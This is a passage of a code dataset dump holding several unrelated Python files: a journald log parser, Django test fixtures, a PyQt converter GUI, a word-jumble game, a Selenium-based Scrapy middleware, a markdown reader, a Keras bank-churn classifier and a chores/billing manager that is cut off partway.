= payload\n\n return entry\n\n def dataobject(data_string, offset):\n data_header = struct.unpack_from(object_header_parse_string, data_string, offset)\n if data_header[0] != 1:\n return None\n\n length = data_header[2] - object_header_size - 48 # 48 := bytes used for hashes below\n\n data_object_parse_string = ('<'\\\n + 'Q' # hash\n + 'Q' # next hash offset\n + 'Q' # next field offset\n + 'Q' # next entry offset\n + 'Q' # entry array offset\n + 'Q' # n entries\n + str(length) # length of payload\n + 's' # payload\n )\n\n data_object = struct.unpack_from(data_object_parse_string, data_string, offset + object_header_size)\n\n payload = data_object[6]\n return payload\n\n # create function-dictionary to emulate switch-case\n functiondict = {\n 0: unused,\n 1: data,\n 2: field,\n 3: entry,\n 4: data_hash_table,\n 5: field_hash_table,\n 6: entry_array,\n 7: tag}\n\n object_header_size = struct.calcsize(object_header_parse_string)\n\n # list of log entries\n entry_list = []\n\n # loop through data_string to find all log entries\n while offset < len(data_string):\n # ensure correct 64-bit-alignment\n if offset % 8 != 0:\n offset = (offset | 7) + 1\n\n object_header = struct.unpack_from(object_header_parse_string, data_string, offset)\n\n try:\n object_type = object_header[0]\n if object_header[2] == 0:\n raise KeyError('Invalid size')\n except KeyError:\n print(object_header)\n break\n\n try:\n # add only entry objects, ignore everything else\n new_entry = functiondict[object_type](data_string, offset + object_header_size)\n except KeyError :\n raise\n\n if new_entry != None:\n entry_list.append(new_entry)\n offset += object_header[2]\n\n clean_entry_list = []\n for entry in entry_list:\n if entry not in clean_entry_list:\n clean_entry_list.append(entry)\n\n for l in clean_entry_list:\n print('{l}'.format(l=l))\n\n\n# define errors\nclass NoJournaldFile(Exception):\n pass\n\nclass UnusedObjectError(Exception):\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"13551664","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom oauth2_provider.models import AccessToken, Application\nfrom rest_framework.test import APIClient\nfrom quiz.models import Quiz, Category, Question\nfrom user.models import User, Point\nimport pytest\n\n\n@pytest.fixture\ndef admin_client(admin_user, application_client):\n access_token = AccessToken.objects.create(\n user=admin_user,\n scope=\"read write\",\n expires=timezone.now() + timedelta(seconds=300),\n token=\"secret-access-token-key\",\n application=application_client\n )\n\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Bearer ' + access_token.token)\n client.force_authenticate(user=admin_user)\n\n return client\n\n\n@pytest.fixture\ndef application_client(admin_user):\n return Application.objects.create(\n name=\"Test Application\",\n redirect_uris=\"http://localhost http://example.com http://example.org\",\n user=admin_user,\n client_type=Application.CLIENT_CONFIDENTIAL,\n authorization_grant_type=Application.GRANT_AUTHORIZATION_CODE,\n )\n\n\n@pytest.fixture\ndef question():\n question = Question()\n question.question = \"test_question\"\n question.answer_A = \"A\"\n question.answer_B = \"B\"\n question.answer_C = \"C\"\n question.save()\n return point\n\n\n@pytest.fixture\ndef category():\n category = Category()\n category.name = \"teste_category\"\n category.save()\n return category\n\n\n@pytest.fixture\ndef point():\n point = Point()\n point.category = 1\n point.points = 20\n point.global_point = 40\n point.save()\n return point\n\n\n@pytest.fixture\ndef user():\n point = Point()\n point.category = 1\n point.points = 20\n point.global_point = 40\n point.save()\n\n user = User()\n user.email = \"user@example.com\"\n user.password = \"test_pass\"\n user.save()\n user.points.add(point)\n return user\n\n\n@pytest.fixture\ndef quiz():\n category = Category()\n category.name = \"teste_category\"\n category.save()\n\n question = Question()\n question.question = \"test_question\"\n question.answer_A = \"test_A\"\n question.answer_B = \"test_B\"\n question.answer_C = \"test_C\"\n question.save()\n\n quiz = Quiz()\n quiz.title = \"test_quiz\"\n quiz.category = category\n quiz.save()\n quiz.question.add(question)\n return quiz","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"26812237","text":"__author__ = 'tylerzhu'\n\nfrom PyQt5.QtGui import (QIcon)\nfrom PyQt5.QtWidgets import (QApplication,\n QMainWindow,\n QHBoxLayout,\n QVBoxLayout,\n QWidget,\n QPushButton,\n QGroupBox)\n\nfrom ui.convertlistUi import ConvertList\nfrom ui.configUi import ConfigUI\nfrom ui.convertResultUi import ResultUI\nimport logging\nimport time\nimport datetime\nimport os\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n # set window's title, icon, size info\n self.setWindowTitle(\"配置转换工具\")\n self.setWindowIcon(QIcon(\"res/main.ico\"))\n self.setMinimumSize(160, 160)\n self.resize(1080, 680)\n\n widget = QWidget()\n self.setCentralWidget(widget)\n\n self.hbox = QHBoxLayout()\n self.hbox.setContentsMargins(5, 5, 5, 5)\n widget.setLayout(self.hbox)\n\n # 左边布局\n # 转换列表\n convGroupBox = QGroupBox(\"转换列表\")\n convGroupBoxLayout = QHBoxLayout()\n convGroupBox.setLayout(convGroupBoxLayout)\n self.convertlist = ConvertList()\n convGroupBoxLayout.addWidget(self.convertlist)\n self.hbox.addWidget(convGroupBox)\n\n # 右边布局\n rwidget = QWidget()\n rwidgetLayout = QVBoxLayout()\n rwidget.setLayout(rwidgetLayout)\n self.hbox.addWidget(rwidget)\n # 1.配置\n confGroupBox = QGroupBox(\"配置\")\n confGroupBoxLayout = QHBoxLayout()\n confGroupBox.setLayout(confGroupBoxLayout)\n self.configUI = ConfigUI()\n confGroupBoxLayout.addWidget(self.configUI)\n rwidgetLayout.addWidget(confGroupBox)\n\n # 2.转换结果\n convResultGroupBox = QGroupBox(\"转换结果\")\n convResultGroupBoxLayout = QVBoxLayout()\n convResultGroupBox.setLayout(convResultGroupBoxLayout)\n self.resultUI = ResultUI()\n convResultGroupBoxLayout.addWidget(self.resultUI)\n rwidgetLayout.addWidget(convResultGroupBox)\n\n # 3. 转换按钮\n pbwidget = QWidget()\n vbox = QHBoxLayout()\n pbwidget.setLayout(vbox)\n clearPB = QPushButton(\"清空提示框\")\n convPB = QPushButton(\"开始转换\")\n # submit.clicked.connect(self.onSubmit)\n vbox.addStretch()\n vbox.addWidget(clearPB)\n vbox.addWidget(convPB)\n rwidgetLayout.addWidget(pbwidget)\n\n # 信号处理\n self.configUI.parseConfigSignal.connect(self.convertlist.parse_conv_list)\n self.configUI.selectResGroupSignal.connect(self.convertlist.select_res_group)\n convPB.clicked.connect(self.convertlist.convert)\n\n\n\ndef init_logger():\n # 创建一个logger\n logger = logging.getLogger('convert_logger')\n logger.setLevel(logging.DEBUG)\n # 创建一个handler,用于写入日志文件\n if not os.path.exists(\"log/\"):\n os.makedirs(\"log\")\n fh = logging.FileHandler('log/convert'\n + datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S') + '.log')\n fh.setLevel(logging.DEBUG)\n # 再创建一个handler,用于输出到控制台\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n # 定义handler的输出格式\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # 给logger添加handler\n logger.addHandler(fh)\n logger.addHandler(ch)\n\nif __name__ == '__main__':\n\n\n\n import sys\n init_logger()\n\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n # window.showFullScreen()\n sys.exit(app.exec_())","sub_path":"convert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"559799075","text":"# Jumble up a given string\nimport random\nimport json\n\nprint('''\n WELCOME TO THIS GAME\n TAKE A GUESS OF THE BELOW WORD BASED ON THE HINT IN FRONT OF IT \n ''')\n\nscore = 0\ndef jumble(string, hint) :\n global score\n firstLetter = string[0]\n lastLetter = string[-1]\n stringList = [char for char in string] \n stringList.pop(0)\n stringList.pop(-1)\n\n randomizedStringList = []\n for i in range(0, len(stringList)) :\n randomChar = random.choice(stringList)\n randomizedStringList.append(randomChar)\n stringList.pop(stringList.index(randomChar))\n\n\n randomizedString = ''\n for char in randomizedStringList :\n randomizedString += char\n firstLetter += randomizedString\n firstLetter += lastLetter\n \n print(firstLetter + ' ---- ' + hint)\n userGuess = input('> ')\n if userGuess == string :\n print('+1')\n score += 1\n elif userGuess.lower() == string.lower() :\n print('small letter - do not do it again')\n \n else:\n print(f'GAME OVER -- YOU SCORE {score}')\n quit()\n \n# wordList = ['Hello', 'Brother', 'Example', 'Graduation', 'Nitrogen', 'Jumbling', 'Vocablury']\n# wordDict = {\n# 'Hello':'Hi', \n# 'Brother':'Sister', \n# 'Example':'Instance', \n# 'Graduation':'College', \n# 'Nitrogen': '71%', \n# 'Jumbling' : 'This game',\n# 'Vocablury' : 'Related to this game'\n# } \nwith open('StringJumbler\\words.json') as file:\n wordDict = json.load(file)\n wordDict = wordDict['words']\nrandomItems = [item for item in wordDict]\nitems = []\n\nfor item in wordDict :\n items.append(random.choice(randomItems)) # needs review\n \nfor item in items:\n jumble(item, wordDict[item])\nprint('YOU WON ALL!')","sub_path":"StringJumbler/StringJumbler.py","file_name":"StringJumbler.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"189026464","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nimport scrapy\nfrom scrapy import signals\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\nimport re\nfrom os import environ\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\noptions.add_argument('window-size=1920x1080')\noptions.binary_location = '/usr/bin/google-chrome'\nbrowser = webdriver.Chrome(executable_path='/opt/google/chrome/chromedriver', chrome_options=options)\nloggedin = False\nwhere_i_am_now = ''\nsearched_same = False\n\ndef log_in_browser(domain):\n global browser\n global loggedin\n global where_i_am_now\n browser.get(domain)\n username_box = browser.find_element_by_id('j_username')\n username = environ['USERNAME']\n username_box.send_keys(username)\n username_box = browser.find_element_by_id('j_password')\n password = environ['PASSWORD']\n username_box.send_keys(password + Keys.RETURN)\n sleep(5)\n where_i_am_now = browser.current_url\n if where_i_am_now.endswith('freshLogin=true'):\n loggedin = True\n else:\n raise AssertionError\n return\n\n\nclass DataSpiderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Response, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass DataDownloaderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the downloader middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_request(self, request, spider):\n # Called for each request that goes through the downloader\n # middleware.\n # Must either:\n # - return None: continue processing this request\n # - or return a Response object\n # - or return a Request object\n # - or raise IgnoreRequest: process_exception() methods of\n # installed downloader middleware will be called\n # begin list of seleniumed URLs\n global where_i_am_now\n global searched_same\n home_url = 'https://webapps1.chicago.gov/buildingrecords'\n login_url = 'https://connectmls-api.mredllc.com/oid/login'\n mls_url = 'https://connectmls'\n search_url = 'https://connectmls3.mredllc.com/mls.jsp?module=search'\n # end list of seleniumed URLs\n if request.url.startswith(home_url):\n address = request.cb_kwargs['full_address']\n browser.get('https://webapps1.chicago.gov/buildingrecords/home')\n radio1 = browser.find_element_by_xpath(\"//input[@id='rbnAgreement1']\")\n radio1.click()\n submit_button = browser.find_element_by_xpath(\"//button[@id='submit']\")\n submit_button.click()\n assert \"Building Permit and Inspection Records\" in browser.title\n text_box = browser.find_element_by_id('fullAddress')\n text_box.send_keys(address + Keys.RETURN)\n sleep(2)\n where_i_am_now = browser.current_url\n body = browser.page_source\n # minify html\n body = body.replace('\\t', '')\n body = body.replace('\\n', '')\n body = re.sub('>\\s*<', '><',body, 0, re.M)\n # minify html\n return HtmlResponse(where_i_am_now, body=body, encoding='utf-8', request=request)\n elif request.url.startswith(mls_url):\n if not loggedin:\n log_in_browser(login_url)\n if request.url.endswith('module=search'):\n if not searched_same:\n browser.get(request.url)\n sleep(2)\n drop_down = Select(browser.find_element_by_id('search_type'))\n drop_down.select_by_value('MEMBER')\n sleep(2)\n browser.get(request.url)\n where_i_am_now = browser.current_url\n body = browser.page_source\n # minify html\n body = body.replace('\\t', '')\n body = body.replace('\\n', '')\n body = re.sub('>\\s*<', '><', body, 0, re.M)\n # / minify html\n return HtmlResponse(where_i_am_now, body=body, encoding='utf-8', request=request)\n else:\n return None\n\n def process_response(self, request, response, spider):\n # Called with the response returned from the downloader.\n\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n","sub_path":"data/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"500867881","text":"from pathlib import Path\nimport os\nimport pypandoc\nimport settings\n\n\nclass MdFile:\n\n def __init__(self):\n pass\n\n async def my_folder(self):\n \"\"\"\n\n :return: return the folder name used by he filesystem where md files are\n \"\"\"\n return os.path.basename(os.path.normpath(settings.FOLDER))\n\n async def data(self):\n \"\"\"\n\n :return: list of notes\n \"\"\"\n data = []\n p = Path(settings.FOLDER).glob('**/*.md')\n for full_file in p:\n file = os.path.basename(str(full_file))\n with open(str(full_file)) as md_file:\n content = md_file.read()\n\n content = pypandoc.convert_text(source=content,\n to='html',\n format=settings.PYPANDOC_MARKDOWN)\n data.append({'title': file, 'body': content})\n return data\n","sub_path":"baeuda/datasource/mdfile.py","file_name":"mdfile.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"445231606","text":"################################################################################\n# Artificial Neural Network #\n# Would a customer leave the bank? #\n# Featuring: #\n# * 70/30 split evaluation schema #\n# * 2 hidden layers #\n# * BatchNormalization #\n# NOTE: #\n# At the end of this script, you can find how to: #\n# (1) Predict new observation in a way that follows the learning schema (DPP). #\n# (2) Find the best threshold for mapping probabilities into binary outcome. #\n################################################################################\n'''\nMake sure python supports tensorflow by installing python version 3.5.3.\nRead the \"py53\" text file\n'''\nimport os\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom tensorflow.contrib.keras import backend\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # filter out WARNING logs\n\n################\n# Get the Data #\n################\n# Importing the dataset\ndataset = pd.read_csv(os.path.join('data', 'Churn_Modelling.csv')) # , index_col='RowNumber')\n# Keep only useful columns\ndataset.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True)\nX = dataset.drop(['Exited'], axis=1).values # returns numpy.ndarry\ny = dataset.loc[:, 'Exited'].values\n\n######################\n# Data Preprocessing #\n######################\n# 1. Encoding the Independent (categorical) Variables\n# Convert labels [Germany, France, Spain] into levels [1, 2, 3]\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n# 2. Convert levels [1, 2, 3] into one-hot representation [001, 010, 100]\nonehotencoder = OneHotEncoder(categorical_features=[1])\nX = onehotencoder.fit_transform(X).toarray()\n# 3. Remove a single one-hot variable to avoid the dummy variable trap\nX = X[:, 1:] # remove column 0\n\n#####################\n# Split the Dataset #\n#####################\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1633)\n\n###################\n# Feature Scaling #\n###################\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n########################################\n# ANN with Stochastic Gradient Descent #\n########################################\n'''\nSTEP 1: Randomly initialise the weights to small numbers close to 0 (but not 0).\nSTEP 2: Input the first observation of your data set in the input layer, each \n feature in one input node.\nSTEP 3: Forward-Propagation: from left to right, the neurons are activated in a\n way that the impact of each neuron's activation is limited by the \n weights. Propagate the activations until getting the predicted result y. \nSTEP 4: Compare the predicted result to the actual result. Measure the generated\n error.\nSTEP 5: Back-Propagation: from right to left, the error is back propagated. \n Update the weights in accordance with how much they are responsible for\n the error. The learning rate decides by how much we update the weights.\nSTEP 6: Repeat steps 2 to 5 and update the weights after each observation\n (Reinforcement Learning). Or: Repeat steps 2 to 5 but update the weights\n only after a batch of observations (Batch Learning).\nSTEP 7: When the whole training set passed through the ANN, that makes an epoch.\n Redo more epochs.\n'''\n\n'''\n###############################\n# The million dollar question #\n###############################\nHow many nodes should be in the hidden layer we are adding?\nWho knows? For this date, there are no explicit guidelines, instead it's \nconsidered as an art.\nIf you don't want to perform art then, define:\nn_in - number of nodes in the input layer\nn_out - number of nodes in the output layer\nthen set the number of nodes in the first hidden layer n_1, to be\nn_1 = (n_in + n_out) / 2\n'''\n\n########################\n# Initializing the ANN #\n########################\nclassifier = Sequential(layers=None) # the design of the layers would be manual\n# Add the input layer and the first hidden layer\nclassifier.add(Dense(units=6, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='relu', # Rectifier function\n input_dim=11) # because we have 11 independent variables\n )\nclassifier.add(BatchNormalization())\n# Add a second hidden layer\nclassifier.add(Dense(units=6, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='relu') # Rectifier function\n )\nclassifier.add(BatchNormalization())\n# Add the output layer\nclassifier.add(Dense(units=1, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='sigmoid') # Sigmoid function, in case of multi-label classification use 'softmax'\n )\n# Compiling the ANN\nclassifier.compile(\n # optimizer; stochastic gradient descent \n optimizer='adam',\n # loss; use 'categorical_crossentropy' for multi-label classification \n loss='binary_crossentropy',\n # metrics; \n metrics=['accuracy']\n)\n\n#################\n# Train the ANN #\n#################\ntime_0 = datetime.datetime.now()\nclassifier.fit(x=X_train, y=y_train,\n batch_size=10, # STEP 6\n epochs=100 # STEP 7\n )\ntime_taken = datetime.datetime.now() - time_0\n\n######################\n# Evaluate the Model #\n######################\n# Choose the liability threshold\nthresholds = np.append(np.arange(0, 1, step=0.01), 1)\naccuracies = np.array([])\nfor threshold in thresholds:\n # Predict the Train set result\n y_pred = classifier.predict(X_train)\n # Apply the liability threshold\n y_lib = (y_pred > threshold)\n # Calculate Accuracy\n accuracies = np.append(accuracies, accuracy_score(y_train, y_lib))\nthreshold = thresholds[np.argmax(accuracies)]\n# Predict the Test set result\ny_pred = classifier.predict(X_test)\ny_lib = (y_pred > threshold)\n# Make the confusion matrix\ncm = confusion_matrix(y_test, y_lib)\n# Calculate Accuracy on the Test set\naccuracy = accuracy_score(y_test, y_lib)\n\n##############\n# Deployment #\n##############\n'''\nPredict if the customer with the following information will leave the bank:\nCredit Score: 600\nGeography: France\nGender: Male\nAge: 40\nTenure: 3\nBalance: 60000\nNumber of Products: 2\nHas Credit Card: Yes\nIs Active Member: Yes\nEstimated Salary: 50000\n'''\n# Get the customer details\nnew_customer = np.array([[600, 'France', 'Male', 40, 3, 6e5, 2, 1, 0, 5e6]], dtype='object')\n# Preprocesss the data\nnew_customer[:, 1] = labelencoder_X_1.transform(new_customer[:, 1])\nnew_customer[:, 2] = labelencoder_X_2.transform(new_customer[:, 2])\nnew_customer = onehotencoder.transform(new_customer).toarray()\nnew_customer = new_customer[:, 1:]\n# Scale the customer\nnew_customer = sc.fit_transform(new_customer)\n# Deploy the model on a new customer\nnew_prediction = classifier.predict(new_customer)\ny_hat = (new_prediction > 0.5)\nprint(\"Should we say goodbye to that customer?\", *y_hat)\n\n#############################\n# Remove model form CPU/GPU #\n#############################\nbackend.clear_session()\n\n#################\n# Print Results #\n#################\nprint('\\n###########################################################')\nprint('# Threshold value: ' + str(threshold)) # Threshold: 0.54, 0.47, 0.52, 0.51\nprint('# Test set accuracy: ' + str(accuracy)) # Accuracy: 0.86, 0.84, 0.84, 0.87\nprint('# Time: ' + str(time_taken)) # Time: 0:00:55\nprint('###########################################################\\n')\n","sub_path":"topic_1_ANN/banking_churn_basic_7030.py","file_name":"banking_churn_basic_7030.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"220618234","text":"# -*- coding: utf8 -*-\nimport json\nimport datetime\nimport uuid\nimport copy\nimport re\nimport random\n\ndef tex_escape(text):\n '''\n :param text: a plain text message\n :return: the message escaped to appear correctly in LaTeX\n '''\n conv = {\n '&': r'\\&',\n '%': r'\\%',\n '$': r'\\$',\n '#': r'\\#',\n '_': r'\\_',\n '{': r'\\{',\n '}': r'\\}',\n '~': r'\\textasciitilde{}',\n '^': r'\\^{}',\n '\\\\': r'\\textbackslash{}',\n '<': r'\\textless',\n '>': r'\\textgreater',\n }\n regex = re.compile('|'.join(re.escape(str(key)) for key in sorted(conv.keys(), key = lambda item: - len(item))))\n return regex.sub(lambda match: conv[match.group()], text)\n\nclass DataHandler:\n def __init__(self):\n self.ConfigFile = 'config/config.json'\n self.AssignmentsFile = 'config/assignments.json'\n self.BillingFile = 'config/billing.json'\n self.DataTexFile = 'tex/data.tex'\n self.DateTexFile = 'tex/date.tex'\n self.BankTexFile = 'tex/bank_details.tex'\n\n self.ConfigData = { 'chores' : {}, 'participants' : {} }\n self.AssignmentsData = {}\n self.BillingData = { 'config' : {'recurring' : 0.0, 'bank_name' : '', 'acc_no' : '', 'acc_holder' : '', 'loc' : ''}, 'bills' : {}, 'group_bills' : {}, 'expenses' : {}, 'payments' : {} }\n\n self.TempWeekAsignment = {}\n\n self.NotFoundData = {\n 'chores' :\n {'freq': -1, 'priority': -1, 'alast': '0001-W1', 'timestamp': '(not found)', 'name': '(not found)', 'uuid': '(not found)', 'atimes': -1, 'points': 0},\n 'participants' :\n {'uuid': '(not found)', 'timestamp': '(not found)', 'name': '(not found)', 'home': False}\n }\n\n try:\n config_file = open(self.ConfigFile, 'r')\n file_string = config_file.read()\n config_file.close()\n self.ConfigData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading configuration file: %s' % e)\n\n self.UpdateConfigFile()\n self.GenerateSortedLists()\n\n try:\n assignments_file = open(self.AssignmentsFile, 'r')\n file_string = assignments_file.read()\n assignments_file.close()\n self.AssignmentsData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading assignments file: %s' % e)\n\n self.UpdateAssignmentsFile()\n\n try:\n billing_file = open(self.BillingFile, 'r')\n file_string = billing_file.read()\n billing_file.close()\n self.BillingData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading billing file: %s' % e)\n\n self.UpdateBillingFile()\n\n def GenerateSortedLists(self):\n self.SortedParticipantsList = [(pid, self.GetItemKey('participants', pid, 'name')) for pid in self.ConfigData['participants']]\n self.SortedParticipantsList.sort(key=lambda e: e[1].lower())\n self.SortedChoresList = [(pid, self.GetItemKey('chores', pid, 'name')) for pid in self.ConfigData['chores']]\n self.SortedChoresList.sort(key=lambda e: e[1].lower())\n\n def AddNewItem(self, key, new_data):\n new_data.update({'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4())})\n self.ConfigData[key][new_data['uuid']] = new_data\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n return new_data['uuid']\n\n def EditItem(self, key, uuid, new_data):\n try:\n self.ConfigData[key][uuid].update(new_data)\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n except:\n return\n\n def RemoveItem(self, key, uuid):\n del self.ConfigData[key][uuid]\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n\n def GetItem(self, key, uuid):\n try:\n return self.ConfigData[key][uuid]\n except Exception as e:\n return self.NotFoundData[key]\n\n def GetItemKey(self, key, uuid, itemkey):\n try:\n return self.ConfigData[key][uuid][itemkey]\n except Exception as e:\n return self.NotFoundData[key][itemkey]\n\n def BillingAddNewItem(self, key, new_data):\n new_data.update({'timestamp': str(datetime.datetime.now()), 'tuuid': str(uuid.uuid4())})\n self.BillingData[key][new_data['tuuid']] = new_data\n self.UpdateBillingFile()\n return new_data['tuuid']\n\n def BillingEditItem(self, key, uuid, new_data):\n self.BillingData[key][uuid].update(new_data)\n self.UpdateBillingFile()\n\n def BillingRemoveItem(self, key, uuid):\n del self.BillingData[key][uuid]\n self.UpdateBillingFile()\n\n def BillingGetItemsInRange(self, key, date0 = None, date1 = None):\n if date0 and date1:\n return [tuuid for tuuid in self.BillingData[key] if date0 <= datetime.date(*self.BillingData[key][tuuid]['date']) <= date1]\n\n elif date0 and date1 == None:\n return [tuuid for tuuid in self.BillingData[key] if date0 <= datetime.date(*self.BillingData[key][tuuid]['date'])]\n\n elif date0 == None and date1:\n return [tuuid for tuuid in self.BillingData[key] if datetime.date(*self.BillingData[key][tuuid]['date']) <= date1]\n\n else:\n return list(self.BillingData[key].keys())\n\n def ComputeDateFromWeek(self, str_date, day = 1):\n return datetime.datetime.strptime('%s-%d' % (str_date, day), '%Y-W%W-%w').date()\n\n def BillingGetChoresInRange(self, date0, date1):\n # chores_data[puuid] = reward\n chores_data = {}\n for (pid, name) in self.SortedParticipantsList:\n chores_data[pid] = 0.0\n\n for key in self.AssignmentsData:\n if date0 <= self.ComputeDateFromWeek(key) <= date1:\n for auuid in self.AssignmentsData[key]['normal']:\n reward = self.GetItemKey('chores', self.AssignmentsData[key]['normal'][auuid]['choreuuid'], 'reward')\n\n chores_data[self.AssignmentsData[key]['normal'][auuid]['personuuid']] += reward * ( 1.0 if self.AssignmentsData[key]['normal'][auuid]['home'] else 0.0 )\n\n for pid in self.AssignmentsData[key]['normal'][auuid]['puuidcomp']:\n chores_data[pid] -= reward\n\n for auuid in self.AssignmentsData[key]['other']:\n reward = self.GetItemKey('chores', self.AssignmentsData[key]['other'][auuid]['choreuuid'], 'reward')\n\n for pid in self.AssignmentsData[key]['other'][auuid]['puuidcomp']:\n chores_data[pid] -= reward\n\n return chores_data\n\n def ComputeCurrentBalance(self, puuid, date = None):\n if date is None:\n bills = sum([self.BillingData['bills'][key]['bill_data']['subtotal'] for key in self.BillingData['bills'] if self.BillingData['bills'][key]['puuid'] == puuid])\n\n payments = sum([self.BillingData['payments'][key]['amount'] for key in self.BillingData['payments'] if self.BillingData['payments'][key]['puuid'] == puuid])\n else:\n bills = sum([self.BillingData['bills'][key]['bill_data']['subtotal'] for key in self.BillingData['bills'] if self.BillingData['bills'][key]['puuid'] == puuid and datetime.date(*self.BillingData[key][tuuid]['date']) <= date])\n\n payments = sum([self.BillingData['payments'][key]['amount'] for key in self.BillingData['payments'] if self.BillingData['payments'][key]['puuid'] == puuid and datetime.date(*self.BillingData[key][tuuid]['date']) <= date])\n\n return bills - self.GetItemKey('participants', puuid, 'boffset') - payments\n\n def GetWeekDifference(self, cdate, choreuuid):\n return int((cdate - self.ComputeDateFromWeek(self.GetItemKey('chores', choreuuid, 'alast'))).days / 7)\n\n def TempClearChores(self):\n del self.TempWeekAsignment\n self.TempWeekAsignment = { 'normal' : {}, 'other' : {} }\n\n def TempAddParticipants(self):\n uuids = {}\n for p in self.ConfigData['participants']:\n uuids[p] = self.TempAddChore('normal', '', p)\n return uuids\n\n def TempAddChore(self, key, cid = '', pid = ''):\n if key == 'normal':\n new_data = {'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4()), 'personuuid' : pid, 'choreuuid' : cid, 'datecomp' : [], 'puuidcomp' : [], 'home' : True}\n self.TempWeekAsignment['normal'][new_data['uuid']] = new_data\n elif key == 'other' and cid != '':\n uuidvar = self.TempCheckChore(cid, ('other',))\n if uuidvar: return uuidvar\n new_data = {'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4()), 'choreuuid' : cid, 'datecomp' : [], 'puuidcomp' : []}\n self.TempWeekAsignment['other'][new_data['uuid']] = new_data\n return new_data['uuid']\n\n def TempRemoveChore(self, key, uuid):\n del 